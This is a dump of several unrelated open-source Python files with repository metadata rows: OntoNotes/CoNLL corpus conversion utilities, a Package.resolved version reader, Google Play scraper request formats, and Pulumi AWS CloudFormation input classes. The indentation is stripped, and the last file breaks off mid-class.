with codecs.open(output_json_file, "w", "utf8") as f:
for doc_id in doc_ids: # Arrange the files in order of id files
for key in doc_ids_to_keys[doc_id]:
f.write(json.dumps(filtered_examples[key], ensure_ascii=False))
f.write("\n")
f.close()
else:
with codecs.open(output_json_file, "w", "utf8") as f:
for doc in filtered_examples.values():
f.write(json.dumps(doc, ensure_ascii=False))
f.write("\n")
f.close()
def normalize_word(word, language):
if language == "arabic":
word = word[:word.find("#")]
if word == "/." or word == "/?":
return word[1:]
else:
return word
def handle_bit(word_index, bit, stack, spans, label_set):
asterisk_idx = bit.find("*")
if asterisk_idx >= 0:
open_parens = bit[:asterisk_idx]
close_parens = bit[asterisk_idx + 1:]
else:
open_parens = bit[:-1]
close_parens = bit[-1]
current_idx = open_parens.find("(")
while current_idx >= 0:
next_idx = open_parens.find("(", current_idx + 1)
if next_idx >= 0:
label = open_parens[current_idx + 1:next_idx]
else:
label = open_parens[current_idx + 1:]
label_set.add(label)
stack.append((word_index, label))
current_idx = next_idx
for c in close_parens:
try:
assert c == ")"
except AssertionError:
print(word_index, bit, spans, stack)
continue
open_index, label = stack.pop()
spans.append((open_index, word_index, label))
''' current_span = (open_index, word_index)
if current_span in spans:
spans[current_span] += "_" + label
else:
spans[current_span] = label
spans[current_span] = label '''
def handle_line(line, document_state: DocumentState, language, labels, stats):
begin_document_match = re.match(BEGIN_DOCUMENT_REGEX, line)
if begin_document_match:
document_state.assert_empty()
document_state.doc_key = get_doc_key(begin_document_match.group(1), begin_document_match.group(2))
return None
elif line.startswith("#end document"):
document_state.assert_finalizable()
finalized_state = document_state.finalize()
stats["num_clusters"] += len(finalized_state["clusters"])
stats["num_mentions"] += sum(len(c) for c in finalized_state["clusters"])
# labels["{}_const_labels".format(language)].update(l for _, _, l in finalized_state["constituents"])
# labels["ner"].update(l for _, _, l in finalized_state["ner"])
return finalized_state
else:
row = line.split()
# Starting a new sentence.
if len(row) == 0:
stats["max_sent_len_{}".format(language)] = max(len(document_state.text),
stats["max_sent_len_{}".format(language)])
stats["num_sents_{}".format(language)] += 1
document_state.finalize_sentence()
return None
assert len(row) >= 12
doc_key = get_doc_key(row[0], row[1])
word = normalize_word(row[3], language)
pos = row[4]
parse = row[5]
lemma = row[6]
predicate_sense = row[7]
speaker = row[9]
ner = row[10]
args = row[11:-1]
coref = row[-1]
word_index = len(document_state.text) + sum(len(s) for s in document_state.sentences)
document_state.text.append(word)
document_state.text_speakers.append(speaker)
document_state.pos_buffer.append(pos)
document_state.lemma_buffer.append(lemma)
handle_bit(word_index, parse, document_state.const_stack, document_state.const_buffer, labels["categories"])
handle_bit(word_index, ner, document_state.ner_stack, document_state.ner_buffer, labels["ner"])
if len(document_state.argument_stacks) < len(args):
document_state.argument_stacks = [[] for _ in args]
document_state.argument_buffers = [[] for _ in args]
for i, arg in enumerate(args):
handle_bit(word_index, arg, document_state.argument_stacks[i], document_state.argument_buffers[i],
labels["srl"])
if predicate_sense != "-":
document_state.predicate_buffer.append(word_index)
if coref != "-":
for segment in coref.split("|"):
if segment[0] == "(":
if segment[-1] == ")":
cluster_id = int(segment[1:-1])
document_state.clusters[cluster_id].append((word_index, word_index))
else:
cluster_id = int(segment[1:])
document_state.coref_stacks[cluster_id].append(word_index)
else:
cluster_id = int(segment[:-1])
start = document_state.coref_stacks[cluster_id].pop()
document_state.clusters[cluster_id].append((start, word_index))
return None
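# Illustrative note (added for clarity): the last CoNLL column carries coreference markers per
# token: '(30' opens cluster 30 at this token, '30)' closes a previously opened mention of
# cluster 30, and '(30)' marks a single-token mention; several such segments on one token are
# separated by '|'. handle_line above converts them into (start, end) spans grouped by cluster id.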
def ontonotes_document_generator(input_path, language, labels, stats):
with open(input_path, "r") as input_file:
document_state = DocumentState()
for line in input_file.readlines():
document = handle_line(line, document_state, language, labels, stats)
if document is not None:
yield document
document_state = DocumentState()
def convert_to_jsonlines(input_path, output_path, language, labels=None, stats=None):
if labels is None:
labels = collections.defaultdict(set)
if stats is None:
stats = collections.defaultdict(int)
count = 0
with open(output_path, "w") as output_file:
for document in ontonotes_document_generator(input_path, language, labels, stats):
output_file.write(json.dumps(document, ensure_ascii=False))
output_file.write("\n")
count += 1
return labels, stats
def make_ontonotes_jsonlines(conll12_ontonotes_path, output_path, languages=None):
if languages is None:
languages = ['english', 'chinese', 'arabic']
for language in languages:
make_ontonotes_language_jsonlines(conll12_ontonotes_path, output_path, language)
def make_ontonotes_language_jsonlines(conll12_ontonotes_path, output_path=None, language='english'):
conll12_ontonotes_path = get_resource(conll12_ontonotes_path)
if output_path is None:
output_path = os.path.dirname(conll12_ontonotes_path)
for split in ['train', 'development', 'test']:
pattern = f'{conll12_ontonotes_path}/data/{split}/data/{language}/annotations/*/*/*/*gold_conll'
files = sorted(glob.glob(pattern, recursive=True))
assert files, f'No gold_conll files found in {pattern}'
version = os.path.basename(files[0]).split('.')[-1].split('_')[0]
if version.startswith('v'):
assert all([version in os.path.basename(f) for f in files])
else:
version = 'v5'
lang_dir = f'{output_path}/{language}'
if split == 'conll-2012-test':
split = 'test'
full_file = f'{lang_dir}/{split}.{language}.{version}_gold_conll'
os.makedirs(lang_dir, exist_ok=True)
print(f'Merging {len(files)} files to {full_file}')
merge_files(files, full_file)
v5_json_file = full_file.replace(f'.{version}_gold_conll', f'.{version}.jsonlines')
print(f'Converting CoNLL file {full_file} to json file {v5_json_file}')
labels, stats = convert_to_jsonlines(full_file, v5_json_file, language)
print('Labels:')
pprint(labels)
print('Statistics:')
pprint(stats)
conll12_json_file = f'{lang_dir}/{split}.{language}.conll12.jsonlines'
print(f'Applying CoNLL 12 official splits on {v5_json_file} to {conll12_json_file}')
id_file = get_resource(f'https://od.hankcs.com/research/emnlp2021/conll.cemantix.org.zip#2012/download/ids/'
f'{language}/coref/{split}.id')
filter_data(v5_json_file, conll12_json_file, id_file)
def ensure_python_points_to_python2():
exitcode, out, version = get_exitcode_stdout_stderr('python --version')
if not version:
version = out
if not version.startswith('Python 2'):
raise EnvironmentError(f'Your python command needs to be Python2, not {version.strip()}. Try:\n\n\t'
'ln -sf "$(which python2)" "$(which python)"')
def make_gold_conll(ontonotes_path, language):
ensure_python_points_to_python2()
ontonotes_path = os.path.abspath(get_resource(ontonotes_path))
to_conll = get_resource(
'https://gist.githubusercontent.com/hankcs/46b9137016c769e4b6137104daf43a92/raw/66369de6c24b5ec47696ae307591f0d72c6f3f02/ontonotes_to_conll.sh')
to_conll = os.path.abspath(to_conll)
# shutil.rmtree(os.path.join(ontonotes_path, 'conll-2012'), ignore_errors=True)
with pushd(ontonotes_path):
try:
flash(f'Converting [blue]{language}[/blue] to CoNLL format, '
f'this might take half an hour [blink][yellow]...[/yellow][/blink]')
run_cmd(f'bash {to_conll} {ontonotes_path} {language}')
flash('')
except RuntimeError as e:
            flash(f'[red]Failed[/red] to convert {language} of {ontonotes_path} to CoNLL. See the exception for details')
raise e
def convert_jsonlines_to_IOBES(json_file, output_file=None, doc_level_offset=True, normalize_token=False):
json_file = get_resource(json_file)
if not output_file:
output_file = os.path.splitext(json_file)[0] + '.ner.tsv'
if normalize_token:
transform = NormalizeToken(PTB_TOKEN_MAPPING, 'token')
with open(json_file) as src, open(output_file, 'w', encoding='utf-8') as out:
for line in src:
doc = json.loads(line)
offset = 0
for sent, ner in zip(doc['sentences'], doc['ner']):
if normalize_token:
sent = transform({'token': sent})['token']
tags = ['O'] * len(sent)
for start, end, label in ner:
if doc_level_offset:
start -= offset
end -= offset
if start == end:
tags[start] = 'S-' + label
else:
tags[start] = 'B-' + label
for i in range(start + 1, end + 1):
tags[i] = 'I-' + label
tags[end] = 'E-' + label
offset += len(sent)
for token, tag in zip(sent, tags):
out.write(f'{token}\t{tag}\n')
out.write('\n')
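# Illustrative output (added for clarity; the sentence and spans are made up): for a sentence
# ['Barack', 'Obama', 'visited', 'Paris'] with ner == [[0, 1, 'PERSON'], [3, 3, 'GPE']]
# (document-level offsets, first sentence, so offset == 0), the rows written would be
#   Barack<TAB>B-PERSON
#   Obama<TAB>E-PERSON
#   visited<TAB>O
#   Paris<TAB>S-GPE
# followed by a blank line separating sentences.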
def make_ner_tsv_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.ner.tsv'
if not os.path.isfile(output_file):
convert_jsonlines_to_IOBES(json_file, output_file)
return output_file
def batch_make_ner_tsv_if_necessary(json_files):
for each in json_files:
make_ner_tsv_if_necessary(each)
def make_pos_tsv_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.pos.tsv'
if not os.path.isfile(output_file):
make_pos_tsv(json_file, output_file)
return output_file
def make_pos_tsv(json_file, output_file):
with open(json_file) as src, open(output_file, 'w', encoding='utf-8') as out:
for line in src:
doc = json.loads(line)
for sent, pos in zip(doc['sentences'], doc['pos']):
for token, tag in zip(sent, pos):
out.write(f'{token}\t{tag}\n')
out.write('\n')
def batch_make_pos_tsv_if_necessary(json_files):
for each in json_files:
make_pos_tsv_if_necessary(each)
def make_con_txt(conll_file, output_file):
with open(output_file, 'w') as out:
for sent in read_tsv_as_sents(conll_file):
tree = []
pos_per_sent = []
for cell in sent:
if cell[0] == '#begin' or cell[0] == '#end':
continue
if len(cell) < 8:
print(cell)
filename, sentence_id, token_id, word, POS, parse, framefile, roleset, *_ = cell
parse = parse.replace('*', f'({POS} {word})')
tree.append(parse)
pos_per_sent.append(POS)
bracketed = ' '.join(tree)
out.write(bracketed)
out.write('\n')
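# Illustrative note (added for clarity): each token's parse bit has its '*' replaced by
# '(POS word)', e.g. a row with parse '(S(NP*', POS 'NNP' and word 'John' contributes
# '(S(NP(NNP John)'; joining all tokens of a sentence yields one bracketed tree per output line.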
def make_con_txt_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.con.txt'
if not os.path.isfile(output_file):
make_con_txt(json_file, output_file)
return output_file
def batch_make_con_txt_if_necessary(json_files):
for each in json_files:
make_con_txt_if_necessary(each)
def batch_remove_empty_category_if_necessary(json_files):
for each in json_files:
src = get_resource(each)
dst = replace_ext(src, '.noempty.txt')
if not os.path.isfile(dst):
remove_all_ec(src)
def make_dep_conllx(con_txt_file, output_file, language='en'):
con_txt_file = get_resource(con_txt_file)
convert_to_dependency(con_txt_file, output_file, language=language)
def make_dep_conllx_if_necessary(con_txt_file: str, language='en'):
con_txt_file = get_resource(con_txt_file)
output_file = con_txt_file.replace('.con.txt', '.dep.conllx', 1)
if os.path.isfile(output_file):
return
make_dep_conllx(con_txt_file, output_file, language)
def batch_make_dep_conllx_if_necessary(con_txt_files, language='en'):
for each in con_txt_files:
make_dep_conllx_if_necessary(each, language)
def make_ner_json_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.ner.jsonlines'
if not os.path.isfile(output_file):
make_ner_json(json_file, output_file)
return output_file
def batch_make_ner_json_if_necessary(json_files):
for each in json_files:
make_ner_json_if_necessary(each)
def make_ner_json(json_file, output_file):
filter_data(json_file, output_file, doc_ids_file=None, annotation='.name')
def make_srl_json_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.srl.jsonlines'
if not os.path.isfile(output_file):
make_srl_json(json_file, output_file)
return output_file
def make_coref_json_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.coref.jsonlines'
if not os.path.isfile(output_file):
make_coref_json(json_file, output_file)
return output_file
def batch_make_srl_json_if_necessary(json_files):
for each in json_files:
make_srl_json_if_necessary(each)
def make_srl_json(json_file, output_file):
filter_data(json_file, output_file, doc_ids_file=None, annotation='.prop')
def batch_make_coref_json_if_necessary(json_files):
for each in json_files:
make_coref_json_if_necessary(each)
def make_coref_json(json_file, output_file):
filter_data(json_file, output_file, doc_ids_file=None, annotation='.coref')
def load_raw_text(onf_file) -> List[str]:
with open(onf_file) as src:
sents = []
expect_sent = False
expect_sent_line = False
sent_parts = []
for line in src:
line = line.strip()
if line == 'Plain sentence:':
expect_sent_line = True
elif expect_sent_line:
expect_sent_line = False
expect_sent = True
continue
elif expect_sent:
if not line:
sents.append(' '.join(sent_parts))
expect_sent = False
sent_parts = []
else:
sent_parts.append(line)
return sents
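# Illustrative .onf fragment this parser expects (sentence text is made up):
#   Plain sentence:
#   ---------------
#   John saw
#   the dog .
#   <blank line>
# load_raw_text skips the underline after the header, joins the wrapped lines, and would
# return ['John saw the dog .'] for such a block.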
def batch_load_raw_text(root: str) -> Dict[str, List[str]]:
onf_files = sorted(glob.glob(os.path.join(root, '**/*.onf'), recursive=True))
sents = dict()
for path in onf_files:
filename = path.split('annotations/')[1][:-len('.onf')]
sents[filename] = load_raw_text(path)
return sents
def make_raw_text_if_necessary(home: str):
home = get_resource(home)
jsonpath = os.path.join(home, 'text.jsonlines')
if os.path.isfile(jsonpath):
return
sents = batch_load_raw_text(home)
save_json(sents, jsonpath)
class RestoreToken(NormalizeToken):
def __init__(self, src: str, mapper: Union[str, dict] = None, dst: str = None) -> None:
if not mapper:
mapper = {
'/-': '-',
'/.': '.',
}
super().__init__(mapper, src, dst)
def __call__(self, sample: dict) -> dict:
src = sample[self.src]
src = [[self.convert(y) for y in x] for x in src]
sample[self.dst] = src
return sample
def main():
if len(sys.argv) != 3:
eprint('2 arguments required: ontonotes_path output_path')
exit(1)
ontonotes_path = sys.argv[1]
output_path = sys.argv[2]
make_ontonotes_jsonlines(ontonotes_path, output_path)
if __name__ == "__main__":
main()
|
6deca30cab8da4ee069751b87a92052f7569cdd3
|
07b0fb1bfecaf76d6176a67f0134b9ce3cc5cf69
|
/etc/get_bson_version.py
|
8db1453d0fb89bd92cf650efd063250129786399
|
[
"Apache-2.0"
] |
permissive
|
mongodb/mongo-swift-driver
|
58e26bbd6cbea6ac6cee55f1832c68ae45b9630d
|
7fe1ba14f54a0f444d78c6ab1a1ce1ee124b6a91
|
refs/heads/main
| 2023-08-28T14:40:32.927651
| 2023-04-13T18:00:02
| 2023-04-13T18:00:02
| 118,030,974
| 354
| 82
|
Apache-2.0
| 2023-08-28T23:54:19
| 2018-01-18T19:55:11
|
Swift
|
UTF-8
|
Python
| false
| false
| 207
|
py
|
get_bson_version.py
|
import json
with open('Package.resolved', 'r') as f:
data = json.load(f)
bson_data = next(d for d in data['object']['pins'] if d['package'] == 'swift-bson')
print(bson_data['state']['version'])
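# Illustrative Package.resolved fragment this script expects (the version number is made up):
#   {"object": {"pins": [{"package": "swift-bson", "state": {"version": "3.0.1"}}]}}
# Running the script in a directory containing such a file would print "3.0.1".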
|
3091efdd1c2ba7f9bc5a57e74343656854d4fcec
|
bacaef23d2e3bf8da1b5a2a0b3bbd560d1ef572c
|
/google_play_scraper/constants/request.py
|
3a02aa7f81ed67c769d72b33e285ebbc3e11ec45
|
[
"MIT"
] |
permissive
|
JoMingyu/google-play-scraper
|
d86fed38bc92fb799c5a2cfe4e46ecd0418cfdd8
|
654bcc55b2ef689bc5051075f9fd4b8fae669099
|
refs/heads/master
| 2023-08-21T14:56:39.955025
| 2023-08-16T06:27:10
| 2023-08-16T06:27:10
| 190,213,255
| 604
| 167
|
MIT
| 2023-09-13T21:31:24
| 2019-06-04T14:02:11
|
Python
|
UTF-8
|
Python
| false
| false
| 4,041
|
py
|
request.py
|
from abc import ABC, abstractmethod
PLAY_STORE_BASE_URL = "https://play.google.com"
class Format(ABC):
@abstractmethod
def build(self, *args):
raise NotImplementedError
@abstractmethod
def build_body(self, *args):
raise NotImplementedError
class Formats:
class _Detail(Format):
URL_FORMAT = (
"{}/store/apps/details?id={{app_id}}&hl={{lang}}&gl={{country}}".format(
PLAY_STORE_BASE_URL
)
)
FALLBACK_URL_FORMAT = "{}/store/apps/details?id={{app_id}}&hl={{lang}}".format(
PLAY_STORE_BASE_URL
)
def build(self, app_id: str, lang: str, country: str) -> str:
return self.URL_FORMAT.format(app_id=app_id, lang=lang, country=country)
def fallback_build(self, app_id: str, lang: str) -> str:
return self.FALLBACK_URL_FORMAT.format(app_id=app_id, lang=lang)
def build_body(self, *args):
return None
class _Reviews(Format):
URL_FORMAT = (
"{}/_/PlayStoreUi/data/batchexecute?hl={{lang}}&gl={{country}}".format(
PLAY_STORE_BASE_URL
)
)
def build(self, lang: str, country: str) -> str:
return self.URL_FORMAT.format(lang=lang, country=country)
PAYLOAD_FORMAT_FOR_FIRST_PAGE = "f.req=%5B%5B%5B%22UsvDTd%22%2C%22%5Bnull%2Cnull%2C%5B2%2C{sort}%2C%5B{count}%2Cnull%2Cnull%5D%2Cnull%2C%5Bnull%2C{score}%5D%5D%2C%5B%5C%22{app_id}%5C%22%2C7%5D%5D%22%2Cnull%2C%22generic%22%5D%5D%5D"
PAYLOAD_FORMAT_FOR_PAGINATED_PAGE = "f.req=%5B%5B%5B%22UsvDTd%22%2C%22%5Bnull%2Cnull%2C%5B2%2C{sort}%2C%5B{count}%2Cnull%2C%5C%22{pagination_token}%5C%22%5D%2Cnull%2C%5Bnull%2C{score}%5D%5D%2C%5B%5C%22{app_id}%5C%22%2C7%5D%5D%22%2Cnull%2C%22generic%22%5D%5D%5D"
def build_body(
self,
app_id: str,
sort: int,
count: int,
filter_score_with: int,
pagination_token: str,
) -> bytes:
if pagination_token is not None:
result = self.PAYLOAD_FORMAT_FOR_PAGINATED_PAGE.format(
app_id=app_id,
sort=sort,
count=count,
score=filter_score_with,
pagination_token=pagination_token,
)
else:
result = self.PAYLOAD_FORMAT_FOR_FIRST_PAGE.format(
app_id=app_id, sort=sort, score=filter_score_with, count=count
)
return result.encode()
class _Permissions(Format):
URL_FORMAT = (
"{}/_/PlayStoreUi/data/batchexecute?hl={{lang}}&gl={{country}}".format(
PLAY_STORE_BASE_URL
)
)
def build(self, lang: str, country: str) -> str:
return self.URL_FORMAT.format(lang=lang, country=country)
PAYLOAD_FORMAT_FOR_PERMISSION = "f.req=%5B%5B%5B%22xdSrCf%22%2C%22%5B%5Bnull%2C%5B%5C%22{app_id}%5C%22%2C7%5D%2C%5B%5D%5D%5D%22%2Cnull%2C%221%22%5D%5D%5D"
def build_body(self, app_id: str) -> bytes:
result = self.PAYLOAD_FORMAT_FOR_PERMISSION.format(app_id=app_id)
return result.encode()
class _Searchresults(Format):
URL_FORMAT = (
"{}/store/search?q={{query}}&c=apps&hl={{lang}}&gl={{country}}".format(
PLAY_STORE_BASE_URL
)
)
FALLBACK_URL_FORMAT = "{}/store/search?q={{query}}&c=apps&hl={{lang}}".format(
PLAY_STORE_BASE_URL
)
def build(self, query: str, lang: str, country: str) -> str:
return self.URL_FORMAT.format(query=query, lang=lang, country=country)
def fallback_build(self, query: str, lang: str) -> str:
return self.FALLBACK_URL_FORMAT.format(query=query, lang=lang)
def build_body(self, *args):
return None
Detail = _Detail()
Reviews = _Reviews()
Permissions = _Permissions()
Searchresults = _Searchresults()
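# Illustrative usage (added for clarity; the app id and query are made up):
#   Formats.Detail.build("com.example.app", lang="en", country="us")
#   # -> "https://play.google.com/store/apps/details?id=com.example.app&hl=en&gl=us"
#   Formats.Searchresults.fallback_build("chess", lang="en")
#   # -> "https://play.google.com/store/search?q=chess&c=apps&hl=en"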
|
97424843efd5089a99cbcc5edb2c05c8ea308ad0
|
1742b6719b988e5519373002305e31d28b8bd691
|
/sdk/python/pulumi_aws/cloudformation/_inputs.py
|
d79d2a6e8dbcf149d97a329c899ecf540d4cea27
|
[
"MPL-2.0",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-aws
|
4f7fdb4a816c5ea357cff2c2e3b613c006e49f1a
|
42b0a0abdf6c14da248da22f8c4530af06e67b98
|
refs/heads/master
| 2023-08-03T23:08:34.520280
| 2023-08-01T18:09:58
| 2023-08-01T18:09:58
| 97,484,940
| 384
| 171
|
Apache-2.0
| 2023-09-14T14:48:40
| 2017-07-17T14:20:33
|
Java
|
UTF-8
|
Python
| false
| false
| 15,618
|
py
|
_inputs.py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'CloudFormationTypeLoggingConfigArgs',
'StackSetAutoDeploymentArgs',
'StackSetInstanceDeploymentTargetsArgs',
'StackSetInstanceOperationPreferencesArgs',
'StackSetOperationPreferencesArgs',
]
@pulumi.input_type
class CloudFormationTypeLoggingConfigArgs:
def __init__(__self__, *,
log_group_name: pulumi.Input[str],
log_role_arn: pulumi.Input[str]):
"""
:param pulumi.Input[str] log_group_name: Name of the CloudWatch Log Group where CloudFormation sends error logging information when invoking the type's handlers.
:param pulumi.Input[str] log_role_arn: Amazon Resource Name (ARN) of the IAM Role CloudFormation assumes when sending error logging information to CloudWatch Logs.
"""
pulumi.set(__self__, "log_group_name", log_group_name)
pulumi.set(__self__, "log_role_arn", log_role_arn)
@property
@pulumi.getter(name="logGroupName")
def log_group_name(self) -> pulumi.Input[str]:
"""
Name of the CloudWatch Log Group where CloudFormation sends error logging information when invoking the type's handlers.
"""
return pulumi.get(self, "log_group_name")
@log_group_name.setter
def log_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "log_group_name", value)
@property
@pulumi.getter(name="logRoleArn")
def log_role_arn(self) -> pulumi.Input[str]:
"""
Amazon Resource Name (ARN) of the IAM Role CloudFormation assumes when sending error logging information to CloudWatch Logs.
"""
return pulumi.get(self, "log_role_arn")
@log_role_arn.setter
def log_role_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "log_role_arn", value)
@pulumi.input_type
class StackSetAutoDeploymentArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
retain_stacks_on_account_removal: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[bool] enabled: Whether or not auto-deployment is enabled.
:param pulumi.Input[bool] retain_stacks_on_account_removal: Whether or not to retain stacks when the account is removed.
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if retain_stacks_on_account_removal is not None:
pulumi.set(__self__, "retain_stacks_on_account_removal", retain_stacks_on_account_removal)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not auto-deployment is enabled.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="retainStacksOnAccountRemoval")
def retain_stacks_on_account_removal(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not to retain stacks when the account is removed.
"""
return pulumi.get(self, "retain_stacks_on_account_removal")
@retain_stacks_on_account_removal.setter
def retain_stacks_on_account_removal(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "retain_stacks_on_account_removal", value)
@pulumi.input_type
class StackSetInstanceDeploymentTargetsArgs:
def __init__(__self__, *,
organizational_unit_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] organizational_unit_ids: The organization root ID or organizational unit (OU) IDs to which StackSets deploys.
"""
if organizational_unit_ids is not None:
pulumi.set(__self__, "organizational_unit_ids", organizational_unit_ids)
@property
@pulumi.getter(name="organizationalUnitIds")
def organizational_unit_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The organization root ID or organizational unit (OU) IDs to which StackSets deploys.
"""
return pulumi.get(self, "organizational_unit_ids")
@organizational_unit_ids.setter
def organizational_unit_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "organizational_unit_ids", value)
@pulumi.input_type
class StackSetInstanceOperationPreferencesArgs:
def __init__(__self__, *,
failure_tolerance_count: Optional[pulumi.Input[int]] = None,
failure_tolerance_percentage: Optional[pulumi.Input[int]] = None,
max_concurrent_count: Optional[pulumi.Input[int]] = None,
max_concurrent_percentage: Optional[pulumi.Input[int]] = None,
region_concurrency_type: Optional[pulumi.Input[str]] = None,
region_orders: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[int] failure_tolerance_count: The number of accounts, per Region, for which this operation can fail before AWS CloudFormation stops the operation in that Region.
:param pulumi.Input[int] failure_tolerance_percentage: The percentage of accounts, per Region, for which this stack operation can fail before AWS CloudFormation stops the operation in that Region.
:param pulumi.Input[int] max_concurrent_count: The maximum number of accounts in which to perform this operation at one time.
:param pulumi.Input[int] max_concurrent_percentage: The maximum percentage of accounts in which to perform this operation at one time.
:param pulumi.Input[str] region_concurrency_type: The concurrency type of deploying StackSets operations in Regions, could be in parallel or one Region at a time. Valid values are `SEQUENTIAL` and `PARALLEL`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] region_orders: The order of the Regions in where you want to perform the stack operation.
"""
if failure_tolerance_count is not None:
pulumi.set(__self__, "failure_tolerance_count", failure_tolerance_count)
if failure_tolerance_percentage is not None:
pulumi.set(__self__, "failure_tolerance_percentage", failure_tolerance_percentage)
if max_concurrent_count is not None:
pulumi.set(__self__, "max_concurrent_count", max_concurrent_count)
if max_concurrent_percentage is not None:
pulumi.set(__self__, "max_concurrent_percentage", max_concurrent_percentage)
if region_concurrency_type is not None:
pulumi.set(__self__, "region_concurrency_type", region_concurrency_type)
if region_orders is not None:
pulumi.set(__self__, "region_orders", region_orders)
@property
@pulumi.getter(name="failureToleranceCount")
def failure_tolerance_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of accounts, per Region, for which this operation can fail before AWS CloudFormation stops the operation in that Region.
"""
return pulumi.get(self, "failure_tolerance_count")
@failure_tolerance_count.setter
def failure_tolerance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_tolerance_count", value)
@property
@pulumi.getter(name="failureTolerancePercentage")
def failure_tolerance_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The percentage of accounts, per Region, for which this stack operation can fail before AWS CloudFormation stops the operation in that Region.
"""
return pulumi.get(self, "failure_tolerance_percentage")
@failure_tolerance_percentage.setter
def failure_tolerance_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_tolerance_percentage", value)
@property
@pulumi.getter(name="maxConcurrentCount")
def max_concurrent_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of accounts in which to perform this operation at one time.
"""
return pulumi.get(self, "max_concurrent_count")
@max_concurrent_count.setter
def max_concurrent_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrent_count", value)
@property
@pulumi.getter(name="maxConcurrentPercentage")
def max_concurrent_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The maximum percentage of accounts in which to perform this operation at one time.
"""
return pulumi.get(self, "max_concurrent_percentage")
@max_concurrent_percentage.setter
def max_concurrent_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrent_percentage", value)
@property
@pulumi.getter(name="regionConcurrencyType")
def region_concurrency_type(self) -> Optional[pulumi.Input[str]]:
"""
The concurrency type of deploying StackSets operations in Regions, could be in parallel or one Region at a time. Valid values are `SEQUENTIAL` and `PARALLEL`.
"""
return pulumi.get(self, "region_concurrency_type")
@region_concurrency_type.setter
def region_concurrency_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region_concurrency_type", value)
@property
@pulumi.getter(name="regionOrders")
def region_orders(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The order of the Regions in where you want to perform the stack operation.
"""
return pulumi.get(self, "region_orders")
@region_orders.setter
def region_orders(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "region_orders", value)
@pulumi.input_type
class StackSetOperationPreferencesArgs:
def __init__(__self__, *,
failure_tolerance_count: Optional[pulumi.Input[int]] = None,
failure_tolerance_percentage: Optional[pulumi.Input[int]] = None,
max_concurrent_count: Optional[pulumi.Input[int]] = None,
max_concurrent_percentage: Optional[pulumi.Input[int]] = None,
region_concurrency_type: Optional[pulumi.Input[str]] = None,
region_orders: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[int] failure_tolerance_count: The number of accounts, per Region, for which this operation can fail before AWS CloudFormation stops the operation in that Region.
:param pulumi.Input[int] failure_tolerance_percentage: The percentage of accounts, per Region, for which this stack operation can fail before AWS CloudFormation stops the operation in that Region.
:param pulumi.Input[int] max_concurrent_count: The maximum number of accounts in which to perform this operation at one time.
:param pulumi.Input[int] max_concurrent_percentage: The maximum percentage of accounts in which to perform this operation at one time.
:param pulumi.Input[str] region_concurrency_type: The concurrency type of deploying StackSets operations in Regions, could be in parallel or one Region at a time.
:param pulumi.Input[Sequence[pulumi.Input[str]]] region_orders: The order of the Regions in where you want to perform the stack operation.
"""
if failure_tolerance_count is not None:
pulumi.set(__self__, "failure_tolerance_count", failure_tolerance_count)
if failure_tolerance_percentage is not None:
pulumi.set(__self__, "failure_tolerance_percentage", failure_tolerance_percentage)
if max_concurrent_count is not None:
pulumi.set(__self__, "max_concurrent_count", max_concurrent_count)
if max_concurrent_percentage is not None:
pulumi.set(__self__, "max_concurrent_percentage", max_concurrent_percentage)
if region_concurrency_type is not None:
pulumi.set(__self__, "region_concurrency_type", region_concurrency_type)
if region_orders is not None:
pulumi.set(__self__, "region_orders", region_orders)
@property
@pulumi.getter(name="failureToleranceCount")
def failure_tolerance_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of accounts, per Region, for which this operation can fail before AWS CloudFormation stops the operation in that Region.
"""
return pulumi.get(self, "failure_tolerance_count")
@failure_tolerance_count.setter
def failure_tolerance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_tolerance_count", value)
@property
@pulumi.getter(name="failureTolerancePercentage")
